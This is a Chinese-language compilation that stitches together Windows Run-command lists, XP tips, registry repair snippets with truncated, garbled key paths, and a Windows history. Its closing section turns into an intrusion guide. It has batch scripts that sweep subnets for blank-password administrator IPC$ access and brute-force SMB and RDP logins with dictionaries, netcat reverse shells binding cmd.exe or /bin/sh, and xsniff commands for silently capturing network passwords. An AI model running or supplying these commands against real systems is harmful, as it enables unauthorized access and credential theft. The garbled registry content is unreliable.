windows管理学命令

A. 电脑命令大全

gpedit.msc-----组策略
Nslookup-------IP地址侦测器
tsshutdn-------60秒倒计时关机命令
rononce -p ----15秒关机
sfc /scannow-----扫描错误并复原
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板

winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器

B. 常用Windows命令分享

在Windows的运行里输入以下命令：

winver－－－－－－－－－检查windows版本

wmimgmt.msc－－－－打开windows管理体系结构(wmi)

wupdmgr－－－－－－－－windows更新程序

w脚本－－－－－－－－windows脚本宿主设置

write－－－－－－－－－－写字板

winmsd－－－－－－－－－系统信息

wiaacmgr－－－－－－－扫描仪和照相机向导

winchat－－－－－－－－xp自带局域网聊天

mem.exe－－－－－－－－显示内存使用情况

msconfig-----------启动

msconfig.exe－－－系统配置实用程序

mplayer2－－－－－－－简易widnows media player

mspaint－－－－－－－－画图板

mstsc－－－－－－－－－－远程桌面连接

mplayer2－－－－－－－媒体播放机

magnify－－－－－－－－放大镜实用程序

mmc－－－－－－－－－－－－打开控制台

mobsync－－－－－－－－同步命令

dxdiag－－－－－－－－－检查directx信息

drwtsn32－－－－－－ 系统医生

devmgmt.msc－－－ 设备管理器

dfrg.msc－－－－－－－磁盘碎片整理程序

diskmgmt.msc－－－磁盘管理实用程序

dcomcnfg－－－－－－－打开系统组件服务

ddeshare－－－－－－－打开dde共享设置

dvdplay－－－－－－－－dvd播放器

nslookup－－－－－－－ip地址侦测器

net stop messenger－－－－－停止信使服务

net start messenger－－－－开始信使服务

notepad－－－－－－－－打开记事本

nslookup－－－－－－－网络管理的工具向导

ntbackup－－－－－－－系统备份和还原

narrator－－－－－－－屏幕“讲述人”

ntmsmgr.msc－－－－移动存储管理器

ntmsoprq.msc－－－移动存储管理员操作请求

netstat －an－－－－(tc)命令检查接口

syncapp－－－－－－－－创建一个公文包

sysedit－－－－－－－－系统配置编辑器

sigverif－－－－－－－文件签名验证程序

sndrec32－－－－－－－录音机

shrpubw－－－－－－－－创建共享文件夹

secpol.msc－－－－－本地安全策略

syskey－－－－－－－－－系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

services.msc－－－本地服务设置

sndvol32－－－－－－－音量控制程序

sfc.exe－－－－－－－－系统文件检查器

sfc /scannow－－－windows文件保护(扫描错误并复原)

tsshutdn－－－－－－－60秒倒计时关机命令

tourstart－－－－－－xp简介（安装完成后出现的漫游xp程序）

taskmgr－－－－－－－－任务管理器 （2000／xp／2003）

eventvwr－－－－－－－事件查看器

eudcedit－－－－－－－造字程序

explorer－－－－－－－打开资源管理器

packager－－－－－－－对象包装程序

perfmon.msc－－－－计算机性能监测程序

progman－－－－－－－－程序管理器

regedit.exe－－－－注册表

rsop.msc－－－－－－－组策略结果集

regedt32－－－－－－－注册表编辑器

rononce －p －－－－15秒关机

regsvr32 /u *.dll－－－－停止dll文件运行

regsvr32 /u zipfldr.dll－－－－－－取消zip支持

cmd.exe－－－－－－－－cmd命令提示符

chkdsk.exe－－－－－chkdsk磁盘检查

certmgr.msc－－－－证书管理实用程序

calc－－－－－－－－－－－启动计算器

charmap－－－－－－－－启动字符映射表

cliconfg－－－－－－－sql server 客户端网络实用程序

clipbrd－－－－－－－－剪贴板查看器

conf－－－－－－－－－－－启动netmeeting

compmgmt.msc－－－计算机管理

cleanmgr－－－－－－－垃圾整理

ciadv.msc－－－－－－索引服务程序

osk－－－－－－－－－－－－打开屏幕键盘

odbcad32－－－－－－－odbc数据源管理器

oobe/msoobe /a－－－－检查xp是否激活

lusrmgr.msc－－－－本机用户和组

logoff－－－－－－－－－注销命令

iexpress－－－－－－－木马捆绑工具，系统自带

fsmgmt.msc－－－－－共享文件夹管理器

utilman－－－－－－－－辅助工具管理器

gpedit.msc－－－－－组策略

windows XP系统蜘蛛牌游戏介绍

蜘蛛牌是windows xp操作系统自带的一款纸牌游戏，游戏规则是这样的：只能将牌拖到比她大一的牌上面（A最小，K最大），如果拖动的牌上有按顺序排好的牌时，那么这些牌也跟着一起移动，游戏的目的是将所有的牌按同一花色从小到大排好，为了简单起见，我们的游戏只有同一花色的10张牌，从A到10，且随机的在一行上展开，编号从1到10，把第i号上的牌移到第j号牌上，移动距离为abs(i-j)，现在你要做的是求出完成游戏的最小移动距离。

蜘蛛牌，spidersolitaire，是WindowsXP自带的一个游戏，非常小只有689K，可是有很多朋友百玩不厌。很多朋友在我安装了系统的时候都希望我给他们找到 蜘蛛牌 。无奈，有的WindowsXP经过优化，没有这个游戏，只好放上来，以备使用，希望没有玩过的朋友有空也玩玩。

蜘蛛牌比扫雷等更加锻炼脑子，是一个非常不错的益智游戏。周围有很多岁数大一点的朋友玩 蜘蛛牌 废寝忘食，我有时候老想笑，不过也有我笑不出来的时候，因为我总是过不了关

听说Vista中也保留了蜘蛛牌，看来这个游戏是常玩不衰了，由于规则简单，此游戏深受办公室MM的欢迎。

我本人不是怎么会玩蜘蛛牌游戏，我试过一次只连过三局，第四局就没拿下来。因为规则不是很懂，也没有想着去研究，也许是我的脑子笨吧，哈。今天还发现我的一帮小朋友也爱上了蜘蛛。我给他们讲故事的时候，很多人都是边听我说，手里边玩。

如何在Windows XP系统下使用“虚拟光驱”？

Windows XP作为一款至今为止最优秀的个人电脑操作平台，不但界面华丽美观，而且功能强大操作简便。从各大报刊媒体对它的介绍来看可见一斑，它受欢迎的程度绝不亚于当时的Windows 98。

现在使用虚拟光驱的朋友是越来越多了，另外随着Windows XP打上了SP1补丁后，对游戏的兼容性的确大大提高了。所以现在用虚拟光盘玩游戏的朋友也相应增多了。

此时问题来了，由于大多数虚拟光驱的开发者都是在FAT32环境下开发的，而如果您在安装Windows XP时选择了NTFS的分区格式，那么死机或系统出现莫名故障就在所难免了。

原因很简单，因为Windows XP为NTFS做了专门的优化，并且虚拟光驱由于本身的特殊机制，在“设备管理器”中通过“欺骗”的手段让Windows误认为增加了物理光驱，而在 Windows XP中系统只设计了还原硬件的驱动，但并没有“还原/删除”硬件本身的功能，因此兼容性问题就产生了。所以笔者建议那些在XP下使用虚拟光驱的朋友们请安装最新版并支持XP的虚拟软件，这样兼容问题会得到妥善的解决。

此外，在Windows XP下虚拟光驱的个数也非常有讲究。众所周知，Windows XP采用了“激活”技术来防止盗版，并且在计算机硬件更改规定的.次数后要求再次进行激活，否则系统将会被锁死。聪明的您可能通过前面的介绍已经想到如果虚拟了4个以上的物理光驱，就可能会触发XP的激活检验机制，因此笔者建议，您如果想使用4个以上的虚拟盘，还是安装双系统，在Windows 98下就不会有这样尴尬的问题发生了。

IE被恶意代码修改怎么办

我的IE主页被不良网站篡改了，现在我的主页选项是灰色的，无法更改，另外注册表也进不去了，请问如何解决？

这个是使用IE上网比较常见的问题，首先请养成良好的上网习惯，这样才能比较好的防止这种问题的发生。要解决这个问题的方法很多，登录3721 网站进行IE修复就是个比较简便的方法（前提当然是你不讨厌3721）。我们这里着重说一下如何使用第三方软件和修改注册表这两种方法。

⑴使用软件修复：

下载金山毒霸注册表修复工具。

下载回来的是一个运行文件Duba_RegSolve.EXE，双击运

行。如果你的注册表被锁住了的话，运行该工具就自动解锁了。其它操作也非常简单，而且有详细的提示，选择“IE常规”，点击清理，IE即可修复成功。打开IE设置，所有原来灰色不可选的选项均恢复正常。另外选择“右键菜单”功能可以清理掉你不需要的右键功能，这对一些不良网站留下的垃圾信息非常有效。你不要以为这样就万事大吉了，由于不良网站可能把某些自运行程序放进了你的系统，所以你重新启动系统后，IE设置又可能被更改。为了解决这个问题，你可以选择“启动运行”这个选项，将可疑程序删除，理论上删除所有的项都不会影响系统的运行，但是还是建议保留输入法图标和电脑同步管理。当然这类IE的保护软件还有很多，限于篇幅我就不多说了，大家可以自己尝试。

⑵通过修改注册表修复。

打开“记事本”，输入下面内容：

WindowsRegistryEditorVersion5.00

[HKEY_CURRENT_]

"disableregistrytools"=dword:00000000

注意：对于Windows9x/Me来说，第一行一定是“REGEDIT4”，而且必须全部大写。而对于Windows2000/XP来说，第一行一定是“Windows Registry Editor Version 5.00”。该信息非常重要，如果不正确，虽然在双击注册表文件后会显示已经导入，但其实并没有成功修改注册表文件的内容。第二行为空行。第三行为子键分支。第四行为该子键分支下的设置数据，其中的“dword”必须全部小写。

双击打开该reg文件，当询问您“确实要把*.reg内的信息添加到注册表吗？”，选择“是”按钮，即可将信息成功输入注册表中。

此时注册表已成功解锁，不必重新启动计算机，只要点击“开始｜运行”，键入Regedit命令，回车后即可打开注册表。

以下提供常见问题需要修改的键值：

（1）恢复EXE文件的打开方式

在WINDOWS安装目录中找到REGEDIT.EXE，将其重命名为REGEDIT.COM，如果你的电脑无法浏览文件的后缀名，可以选择“工具”-“文件夹选项”-“查看”-取消“隐藏已知文件类型的扩展名”。

[HKEY_CLASSES_ROOTexefileshellopencommand]

@=""%1"%*"

（2）删除IE地址栏下拉菜单内的网址

[-HKEY_CURRENT_]

（3）修复windows注册名称和单位

[HKEY_LOCAL_]

"RegisteredOwner"="你所希望的名称"

"RegisteredOrganization"="你所希望的单位"

（4）恢复桌面右键菜单

[HKEY_CURRENT_Explorer]

"NoViewContextMenu"=dword:00000000

[HKEY_LOCAL_PoliciesExplorer]

"NoViewContextMenu"=dword:0000

0000

（5）恢复桌面图标

[HKEY_CURRENT_Explorer]

"NoDesktop"=-

[HKEY_LOCAL_PoliciesExplorer]

"NoDesktop"=-

（6）恢复被隐藏的控制面板

[HKEY_CURRENT_Explorer]

"NoSetFolders"=-

[HKEY_LOCAL_PoliciesExplorer]

"NoSetFolders"=-

（7）恢复IE工具栏的链接名称

[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerToolbar]

"LinksFolderName"="链接"

（8）恢复internet选项安全页面自定义按钮

[HKEY_CURRENT_]

"SecChangeSettings"=dword:0

（9）修复隐藏分区

[HKEY_CURRENT_Explorer]

"NoDrives"=dword:000000

看Windows发展对用户的潜移默化影响

如果对所有电脑用户做一个问卷调查，收集他们心目中理想操作系统的模样，相信会收到不计其数的意见。但是在这些意见中，或许绝大多数都是基于用户正在使用的系统，要么是这里修改一下，要么是那里加点东西，很难发现有什么颠覆性的建议。回顾一下目前最流行的个人桌面操作系统Windows的发展，我们会发现在版本更迭过程中，Windows系统其实有不少成功的创新和变革，正是这些变化对用户使用习惯产生了较大改变。

其实Windows的诞生本身就是一次革命，从命令行界面演变为图形界面模式，让电脑使用门槛大幅降低，用户不再需要记忆各种常用命令，只需用鼠标点几下就行。而在Windows问世前，恐怕很少有用户想过图形化的操作界面，虽然Windows并不是（图形界面系统）鼻祖，但它实实在在改变了用户对电脑的使用方式。

PS：回想了一下，我最早接触电脑那会儿，正是DOS和Win 3.x在国内流行的时候。

首个成功的Windows系统：Win 3.x

Win95，微软第二个具有代表性的Windows系统（当然国内用户更熟悉的是它升级改良后的版本：Win98），它建立了一套全新的Windows系统基本界面结构，包括桌面、开始按钮和菜单、任务栏，窗口形式等，这些元素一直沿用到如今Windows 7，直到即将发售的Windows 8，开始按钮和菜单才被取消。同时，Win95首次抛弃对16位处理器架构的支持，间接加速了32位处理器的发展。

同样成功的Windows 95

除了这套用户界面的基本元素外，Win95在随后的升级过程中，先后加入了IE浏览器、USB支持等重要功能，让电脑不再限于单机工作，普通用户通过它首次踏入互联网的世界。

Win95之后的Win98以性能改善为主，虽没有什么重大改变，但凭借良好的兼容性和易用性以及恰当的时机，成为第一个在国内大规模普及的Windows系统。Win2000则是主要面向工作站与服务器，并不适合个人家庭用户。

Windows XP，这是微软首次将面向服务器市场的NT核心引入到个人消费市场，因此XP的稳定性较Win98有大幅提高。这是一项核心级的改革，表面上虽然看不出什么明显区别，但具有十年以上电脑使用时间的用户肯定会发觉变化。其他方面，XP引入了桌面主题和多种视觉特效（默认桌面蓝天白云甚至成为XP的代表）、内置防火墙（SP2版本加入）、远程桌面、支持无线网络、支持64位架构等数项功能。

大家熟悉的WinXP

稳定的用户体验，是XP成功的重要支柱之一。

经历XP的成功之后，Vista作为接班者并未获得太多用户的认可，虽然它在用户界面以及安全性等方面有较大升级，但却因为软硬件兼容性和性能问题拖了后腿，导致市场反响不佳，成为近年来少有的不成功产品。

总结了Vista的经验之后，Windows 7在正式发售前发布了多个测试版本供用户体验并收集反馈意见，事实证明这是个正确的选择，Windows 7发售至今，已经卖出6亿份以上的授权。

时下最流行的Windows 7系统

从功能上看，Win7进一步优化多核处理器效率以提升性能，更好的硬件设备支持，更方便的个性化设置，全新的日常任务操作体验，更少的打扰用户以及首次支持多点触摸设备。Windows 7的Aero桌面主要继承自Vista，并新增了一项我最喜欢的功能：超级任务栏。它让用户的注意重心从传统桌面转移到任务栏上，包括常用程序、最近使用的文件、文件夹都能从任务栏上快速调用，同时又不会占用其他程序运行时的空间位置。

快速高效又不失华丽，让Windows 7成为眼下最流行的个人电脑操作系统。

未来，Windows 8又将会带来不同的新体验，无论你是用传统电脑还是平板设备，通过Windows 8用户只需极短的适应过程就能玩转在两种设备之间。

Windows关机重启只在一秒瞬间

1.关机/重启只要1秒钟

Windows 2000/XP关机速度慢一直是不少用户的隐痛，因此有人摸索出了下面这个“非正常”的技巧。

如果想让Windows 2000以瞬间的速度重启，那么可以按下Ctrl+Alt+Del组合??幼旁诘慊鳌肮鼗?卑磁耐?卑醋?trl，这时系统会弹出警告提示:“如果继续，您的机器会重新启动，未保存的数据将丢失，如非绝对必要，请勿采取此步骤”，点击“确定”，那么Windows 2000将会瞬间重启，并不会显示关机画面。

对于Windows XP，则可以在按下Ctrl+Alt+Del后，在弹出的“任务管理器”中点击“关机→关机”，与此同时按Ctrl，不到1秒钟你会发现系统已经关闭了，简直就在眨眼之间，同样道理，如果在“关机”菜单中选择“重启”，即可快速重启。

2.Super Fast Shutdown令关机、重启超级快

上面的技巧总感觉有些不太美妙，有可能会造成数据丢失或其他问题，因此建议你选择Super Fast Shutdown这款免费软件。安装后它会在桌面和快速启动栏生成关机和重启的快捷方式，只要按下相应的快捷方式，就能在瞬间关机或重启。不过要注意的是，有些电脑在关机后，会出现“现在可以安全地关机了”的画面，还需要按下机箱上的电源按钮来彻底关闭。

小提示

建议在按下相应快捷方式前，将所有打开的程序关闭掉，以免出现数据丢失的问题。

C. 麻烦各位告诉我一些DOS命令，什么命令都行啊

passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量 基本格式：
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；"(1 -1 254)"说明：即从254到1 }

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。
用法举例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

#7 七：

2：if命令及变量 基本格式：
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为"真"。
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
例："if "%2%"=="4" goto start"指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
例："if not nc.exe goto end"指：如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如："if exist test.txt. else echo test.txt.missing "，注意命令中的"."

（二）系统外部命令(均需下载相关工具)：

1、瑞士军刀：nc.exe

参数说明：
-h 查看帮助信息
-d 后台模式
-e prog程序重定向，一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式，用于入站连接
-L 监听模式，连接天闭后仍然继续监听，直到CTR+C
-n IP地址，不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出，用-vv将更详细
-w数字 timeout延时间隔
-z 将输入，输出关掉（用于扫锚时）
基本用法：
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法：
nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止
nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用：nc -l -p 本机端口
在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注：
| 管道命令
< 或 > 重定向命令。"<"，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中
>与>>的区别 ">"指：覆盖；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

#8 八：

2、扫锚工具：xscan.exe

基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接（多线程）
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用－f后面的密码
-F 间隔时间（频率）
-l 使用－l后面的用户名
-w 使用－w后面的密码字典
-p 使用－p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)
hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。

5、其它：

Shutdown.exe
Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时，他扫到的结果会完全是www.sina.com.cn的主机信息
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。
OpenTelnet.exe (远程开启telnet工具)
opentelnet.exe \\IP 帐号 密码 ntlm认证方式 Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet \\ip 连接上对方。
NTLM认证方式：0：不使用NTLM身份验证；1：先尝试NTLM身份验证，如果失败，再使用用户名和密码；2：只使用NTLM身份验证。

ResumeTelnet.exe (OpenTelnet附带的另一个工具)
resumetelnet.exe \\IP 帐号 密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。

#10 十：

6、FTP命令详解：

FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。

FTP的命令行格式为：
ftp -v -d -i -n -g [主机名] ，其中

-v 显示远程服务器的所有响应信息；

-n 限制ftp的自动登录，即不使用；.n etrc文件；

-d 使用调试方式；

-g 取消全局文件名。

FTP使用的内部命令如下(中括号表示可选项):

1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip
2.$ macro-ame[args]： 执行宏定义macro-name。

3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。
6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。
8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。
10.cd remote-dir：进入远程主机目录。

11.cp：进入远程主机目录的父目录。
12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。

13.close：中断与远程服务器的ftp会话(与open对应)。
14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

15.delete remote-file：删除远程主机文件。
16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。
18.disconnection：同close。

19.form format：将文件传输方式设置为format，缺省为file方式。
20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。
22.hash：每传输1024字节，显示一个hash符号(#)。

23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。
24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。

25.image：设置二进制传输方式(同binary)。
26.lcd[dir]：将本地工作目录切换至dir。

27.ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。
28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29.mdelete[remote-file]：删除远程主机文件。
30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。

31.mget remote-files：传输多个远程文件。
32.mkdir dir-name：在远程主机中建一目录。

33.mls remote-file local-file：同nlist，但可指定多个文件名。
34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。

35.modtime file-name：显示远程主机文件的最后修改时间。
36.mput local-file：将多个文件传输至远程主机。

37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。
38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

41.open host[port]：建立指定ftp服务器连接，可指定连接端口。
42.passive：进入被动传输方式。

43.prompt：设置多个文件传输时的交互提示。
44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。
45.put local-file[remote-file]：将本地文件local-file传送至远程主机。
46.pwd：显示远程主机的当前工作目录。

47.quit：同bye，退出ftp会话。
48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.

49.recv remote-file[local-file]：同get。
50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。

51.rhelp[cmd-name]：请求获得远程主机的帮助。
52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。

